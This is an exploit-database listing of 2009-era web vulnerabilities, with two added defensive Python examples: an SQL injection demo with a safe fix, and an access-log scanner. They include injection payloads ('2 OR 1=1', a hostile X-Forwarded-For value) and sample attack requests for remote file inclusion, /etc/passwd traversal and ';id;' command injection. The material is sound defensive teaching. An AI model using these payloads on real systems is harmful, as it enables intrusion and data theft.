Exploitdb Exploits

31,348 exploits tracked across all sources.

CVE-2009-0573 EXPLOITDB text VERIFIED
FotoWeb 6.0 Build 273 - Cross-Site Scripting via Login and Grid Search Parameters
Multiple cross-site scripting (XSS) vulnerabilities in FotoWeb 6.0 (Build 273) allow remote attackers to inject arbitrary web script or HTML via the (1) s parameter to cmdrequest/Login.fwx and the (2) search parameter to Grid.fwx.
by Stelios Tigkas
CVE-2009-1256 EXPLOITDB text VERIFIED
FlexCMS 2.5 - SQL Injection via ItemId Parameter
SQL injection vulnerability in FlexCMS 2.5 allows remote attackers to execute arbitrary SQL commands via the ItemId parameter. NOTE: some of these details are obtained from third party information.
by MisterRichard
EIP-2026-107014 EXPLOITDB text VERIFIED
eZoneScripts (Multiple Scripts) - Insecure Cookie Authentication Bypass
by JIKO
CVE-2009-0516 EXPLOITDB text VERIFIED
BusinessSpace <= 1.2 - SQL Injection via Classified Page id Parameter
SQL injection vulnerability in the classified page (classified.php) in BusinessSpace 1.2 and earlier allows remote attackers to execute arbitrary SQL commands via the id parameter to index.php.
by K-159
EIP-2026-105490 EXPLOITDB text VERIFIED
Bitrix Site Manager 6/7 - Multiple Input Validation Vulnerabilities
by aGGreSSor
CVE-2009-0527 EXPLOITDB text VERIFIED
AdaptCMS Lite 1.4 - Remote Code Execution via RSS Importer Sitepath Parameter
PHP remote file inclusion vulnerability in plugins/rss_importer_functions.php in AdaptCMS Lite 1.4 allows remote attackers to execute arbitrary PHP code via a URL in the sitepath parameter.
by RoMaNcYxHaCkEr
CVE-2009-0531 EXPLOITDB text VERIFIED
A Better Member-Based ASP Photo Gallery <1.2 - SQL Injection
SQL injection vulnerability in gallery/view.asp in A Better Member-Based ASP Photo Gallery before 1.2 allows remote attackers to execute arbitrary SQL commands via the entry parameter.
by BackDoor
CVE-2009-0611 EXPLOITDB text VERIFIED
Novell Open Enterprise Server 1.x (QuickFinder Server AdminServlet) - Multiple Cross-Site Scripting
Multiple cross-site scripting (XSS) vulnerabilities in qfsearch/AdminServlet in QuickFinder Server in Novell Open Enterprise Server 1.x allow remote attackers to inject arbitrary web script or HTML via (1) the siteloc parameter in a displayaddsite action, the site parameter in a (2) generalproperties or (3) clusterserviceproperties action, (4) the adminurl parameter in a global action, or (5) the print-list parameter.
by Ivan Sanchez
EIP-2026-104053 EXPLOITDB text VERIFIED
PyBlosxom 1.6.3 Atom Flavor - Multiple XML Injection Vulnerabilities
by Nam Nguyen
CVE-2009-0545 EXPLOITDB text VERIFIED
ZeroShell <= 1.0beta11 - Command Injection via kerbynet type Parameter
cgi-bin/kerbynet in ZeroShell 1.0beta11 and earlier allows remote attackers to execute arbitrary commands via shell metacharacters in the type parameter in a NoAuthREQ x509List action.
by ikki
EIP-2026-101145 EXPLOITDB text VERIFIED
3Com OfficeConnect Wireless Cable/DSL Router - Authentication Bypass
by ikki
EIP-2026-101054 EXPLOITDB text VERIFIED
Nokia N95-8 - '.jpg' Remote Crash (PoC)
by Juan Yacubian
CVE-2009-0680 EXPLOITDB text VERIFIED
Netgear SSL312 - Denial of Service via Crafted Query String
cgi-bin/welcome/VPN_only in the web interface in Netgear SSL312 allows remote attackers to cause a denial of service (device crash) via a crafted query string, as demonstrated using directory traversal sequences.
by Rembrandt
CVE-2009-0570 EXPLOITDB text VERIFIED
Ninja Designs Mailist 3.0 - Path Traversal
Directory traversal vulnerability in send.php in Ninja Designs Mailist 3.0, when register_globals is enabled and magic_quotes_gpc is disabled, allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the load parameter. NOTE: some of these details are obtained from third party information.
by SirGod
EIP-2026-114620 EXPLOITDB text VERIFIED
Zeroboard4 pl8 (07.12.17) - Multiple Vulnerabilities
by make0day
CVE-2009-0602 EXPLOITDB text VERIFIED
WikkiTikkiTavi 1.11 - Unauthenticated Arbitrary File Upload and Remote Code Execution via upload.php
Unrestricted file upload vulnerability in upload.php in WikkiTikkiTavi 1.11 allows remote attackers to execute arbitrary code by uploading a file with an executable extension, then accessing it via a direct request to the file in img/.
by ByALBAYX
EIP-2026-112046 EXPLOITDB text VERIFIED
SilverNews 2.04 - Authentication Bypass / Local File Inclusion / Remote Code Execution
by x0r
CVE-2009-0639 EXPLOITDB text VERIFIED
phpyabs 0.1.2 - Remote Code Execution via Azione Parameter
PHP remote file inclusion vulnerability in moduli/libri/index.php in phpyabs 0.1.2 allows remote attackers to execute arbitrary PHP code via a URL in the Azione parameter.
by Arka69
CVE-2009-0571 EXPLOITDB text VERIFIED
Ninja Designs Mailist 3.0 - Information Disclosure via Backup Directory
admin.php in Ninja Designs Mailist 3.0 stores backup copies of maillist.php under the web root with insufficient access control, which allows remote attackers to obtain sensitive information via a direct request to the backup directory.
by SirGod
EIP-2026-107779 EXPLOITDB text VERIFIED
Ilch CMS 1.1 - 'HTTP_X_FORWARDED_FOR' SQL Injection
by Gizmore
CVE-2009-0574 EXPLOITDB text VERIFIED
Easy CafeEngine - SQL Injection via catid Parameter
SQL injection vulnerability in index.php in Easy CafeEngine allows remote attackers to execute arbitrary SQL commands via the catid parameter, a different vector than CVE-2008-4604.
by SuNHouSe2
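Several entries above share one root cause: a request value (the FlexCMS ItemId, the BusinessSpace id, the Photo Gallery entry, the Easy CafeEngine catid, and in the Ilch case the HTTP_X_FORWARDED_FOR header) is concatenated into an SQL string. The following is an added example, not code from any of the listed projects: a constructed SQLite schema with a "published" flag, the vulnerable string-building pattern beside its parameterised replacement, and the header-sourced variant, which matters because proxies and CDNs aside, X-Forwarded-For is set by whoever sends the request. Table, column and header names are assumptions for the illustration.

```python
import sqlite3

def make_db():
    """Constructed sample database: one unpublished row the public page must never show."""
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE items (ItemId INTEGER PRIMARY KEY, title TEXT, published INTEGER)")
    con.executemany("INSERT INTO items VALUES (?, ?, ?)", [
        (1, "Welcome", 1),
        (2, "Draft: Q3 numbers", 0),
        (3, "Pricing", 1),
    ])
    con.execute("CREATE TABLE visits (ip TEXT, path TEXT)")
    return con

def fetch_item_vulnerable(con, item_id):
    # The ItemId/id/catid pattern: the raw request value is glued into the statement,
    # so "2 OR 1=1" turns the published-only filter into (published=1 AND ItemId=2) OR 1=1.
    sql = ("SELECT ItemId, title FROM items WHERE published = 1 AND ItemId = "
           + item_id + " ORDER BY ItemId")
    return con.execute(sql).fetchall()

def fetch_item_safe(con, item_id):
    # Type-check first (an id is an integer, nothing else), then bind as a parameter.
    try:
        n = int(item_id)
    except ValueError:
        return []
    return con.execute(
        "SELECT ItemId, title FROM items WHERE published = 1 AND ItemId = ? ORDER BY ItemId",
        (n,),
    ).fetchall()

def _client_ip(headers):
    # Assumed framework behaviour: prefer X-Forwarded-For, fall back to the socket address.
    return headers.get("X-Forwarded-For", headers.get("REMOTE_ADDR", ""))

def log_visit_vulnerable(con, headers, path):
    # The Ilch-style bug: a header is "not user input" only in the developer's head.
    con.execute("INSERT INTO visits VALUES ('" + _client_ip(headers) + "', '" + path + "')")
    con.commit()

def log_visit_safe(con, headers, path):
    con.execute("INSERT INTO visits VALUES (?, ?)", (_client_ip(headers), path))
    con.commit()

def demo():
    """Run both variants against the constructed database and return the observations."""
    con = make_db()
    out = {}
    out["vuln_all_rows"] = fetch_item_vulnerable(con, "2 OR 1=1")   # draft row leaks
    out["safe_rejected"] = fetch_item_safe(con, "2 OR 1=1")         # not an integer: nothing
    out["safe_draft_hidden"] = fetch_item_safe(con, "2")            # unpublished: nothing
    # A header that closes the string and substitutes a subquery for the path column,
    # copying the unpublished title into a table the attacker can later read back.
    hostile = {"X-Forwarded-For": "1.2.3.4', (SELECT title FROM items WHERE published = 0)) -- "}
    log_visit_vulnerable(con, hostile, "/index.php")
    out["vuln_leaked_path"] = con.execute("SELECT path FROM visits").fetchall()
    con.execute("DELETE FROM visits")
    log_visit_safe(con, hostile, "/index.php")
    out["safe_stored_literally"] = con.execute("SELECT ip FROM visits").fetchall()
    return out

if __name__ == "__main__":
    for k, v in demo().items():
        print(k, v)
```

The two fixes are the same fix: treat every value that arrives with the request, headers included, as untrusted, and hand it to the driver as a bound parameter rather than as SQL text. The integer cast on the id is belt-and-braces on top of that, not a substitute for it.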
CVE-2009-0765 EXPLOITDB text VERIFIED
Kipper 2.01 - Path Traversal via Configfile Parameter
Directory traversal vulnerability in index.php in Kipper 2.01 allows remote attackers to include and execute arbitrary local files via a .. (dot dot) in the configfile parameter.
by RoMaNcYxHaCkEr
CVE-2009-0763 EXPLOITDB text VERIFIED
Kipper 2.01 - Cross-Site Scripting via Charm Parameter
Cross-site scripting (XSS) vulnerability in default.php in Kipper 2.01 allows remote attackers to inject arbitrary web script or HTML via the charm parameter.
by RoMaNcYxHaCkEr
CVE-2009-0767 EXPLOITDB text VERIFIED
Bookelves Kipper 2.01 - Unauthenticated Credential Exposure via Direct Request
Kipper 2.01 stores sensitive information under the web root with insufficient access control, which allows remote attackers to download a file containing credentials via a direct request for job/config.data.
by RoMaNcYxHaCkEr
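Four of the vectors in this list leave a recognisable trace in a plain web-server access log: a URL in a parameter (the AdaptCMS sitepath and phpyabs Azione remote file inclusions), dot-dot sequences in a parameter (the Mailist load and Kipper configfile traversals), shell metacharacters in a parameter (the ZeroShell kerbynet type injection), and direct requests for backup or configuration files under the web root (the Mailist backup directory and Kipper job/config.data). The script below is an added example for retrospective hunting, not code from any of the projects listed: it parses combined-format log lines, decodes each query parameter twice to catch double-encoded payloads, and tags requests by class. The sample log lines are constructed and only loosely modelled on the listed vectors; the parameter layouts, the list of sensitive file extensions, and the metacharacter set are assumptions to tune for your own applications.

```python
import re
from urllib.parse import urlsplit, parse_qsl, unquote

# Constructed sample lines in Apache "combined" format; not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [01/Mar/2009:10:00:01 +0000] "GET /plugins/rss_importer_functions.php?sitepath=http://203.0.113.9/s.txt? HTTP/1.1" 200 512 "-" "curl/7.19"
10.0.0.6 - - [01/Mar/2009:10:00:02 +0000] "GET /send.php?load=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 1024 "-" "Mozilla/5.0"
10.0.0.7 - - [01/Mar/2009:10:00:03 +0000] "GET /cgi-bin/kerbynet?type=%3Bid%3B HTTP/1.1" 200 200 "-" "Mozilla/5.0"
10.0.0.8 - - [01/Mar/2009:10:00:04 +0000] "GET /job/config.data HTTP/1.1" 200 300 "-" "Mozilla/5.0"
10.0.0.9 - - [01/Mar/2009:10:00:05 +0000] "GET /index.php?page=news&id=42 HTTP/1.1" 200 4096 "-" "Mozilla/5.0"
"""

# Request line and status from the combined format; the rest of the line is ignored.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})'
)

TRAVERSAL_RE = re.compile(r'(^|[/\\])\.\.([/\\]|$)')
# Remote/stream wrappers that an include() would fetch or interpret.
REMOTE_URL_RE = re.compile(r'^\s*(https?|ftps?|php|data|expect)://', re.I)
# Deliberately narrow: ';', '|', backtick, newline and $( ) are rarely legitimate in a value.
SHELL_META_RE = re.compile(r'[;|`\n]|\$\(')
# Assumption: backup/config artefacts commonly left under the web root. ".data" is
# included because of the Kipper job/config.data vector.
SENSITIVE_PATH_RE = re.compile(r'(\.(bak|old|orig|sql|data|inc)$|~$|/backups?/)', re.I)

def _decode(value):
    # Two rounds of percent-decoding catch double-encoded forms such as %252e%252e/
    # that are built to slip past a filter which decodes only once.
    return unquote(unquote(value))

def inspect_request(target):
    """Return [(category, where)] findings for one request target (path + query)."""
    findings = []
    parts = urlsplit(target)
    path = _decode(parts.path)
    if TRAVERSAL_RE.search(path):
        findings.append(("traversal", "path"))
    if SENSITIVE_PATH_RE.search(path):
        findings.append(("sensitive_file", path))
    for name, raw in parse_qsl(parts.query, keep_blank_values=True):
        value = _decode(raw)
        if TRAVERSAL_RE.search(value):
            findings.append(("traversal", name))
        if REMOTE_URL_RE.match(value):
            findings.append(("remote_url", name))
        if SHELL_META_RE.search(value):
            findings.append(("shell_metachar", name))
    return findings

def scan_log(text):
    """Parse combined-format lines; return (ip, status, category, where) per finding."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        for category, where in inspect_request(m.group("target")):
            hits.append((m.group("ip"), int(m.group("status")), category, where))
    return hits

if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit)
```

The status code is carried through on purpose: a 200 on a sensitive-file request or on a traversal attempt is the line to escalate, while a run of 404s from one address is reconnaissance. The metacharacter check will produce some noise on free-text parameters; scope it to the parameters your applications treat as file names, hosts or commands before running it over a large log.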
CVE-2009-0455 EXPLOITDB text VERIFIED
glFusion <= 1.1.1 - Cross-Site Scripting via Anonymous Comments Username Parameter
Cross-site scripting (XSS) vulnerability in the anonymous comments feature in lib-comment.php in glFusion 1.1.0, 1.1.1, and earlier versions allows remote attackers to inject arbitrary web script or HTML via the username parameter to comment.php.
by Bjarne Mathiesen Schacht